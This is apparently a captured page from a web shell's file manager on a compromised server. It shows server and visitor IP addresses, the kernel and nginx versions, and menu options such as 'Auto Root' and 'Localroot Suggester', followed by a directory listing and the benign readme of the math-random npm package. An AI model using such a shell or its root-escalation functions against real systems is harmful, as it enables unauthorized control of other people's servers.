Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.197.188
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
math-random /
Delete
Unzip
Name
Size
Permission
Date
Action
.npmignore
15
B
-rw-r--r--
2017-07-13 07:43
.travis.yml
65
B
-rw-r--r--
2017-07-13 07:43
browser.js
503
B
-rw-r--r--
2017-07-13 08:34
node.js
236
B
-rw-r--r--
2017-07-13 05:17
package.json
1.46
KB
-rw-r--r--
2021-02-04 21:24
readme.md
590
B
-rw-r--r--
2017-07-13 07:46
test.js
707
B
-rw-r--r--
2017-07-13 07:43
Save
Rename
# math-random math-random is an drop-in replacement for Math.random that uses cryptographically secure random number generation, where available. It works in both browser and node environments. [](https://travis-ci.org/michaelrhodes/math-random) ## Install ```sh npm install math-random ``` ### Usage ```js var random = require('math-random') console.log(random()) => 0.584293719381094 console.log(random.cryptographic) => true || undefined ``` ### License [MIT](http://opensource.org/licenses/MIT)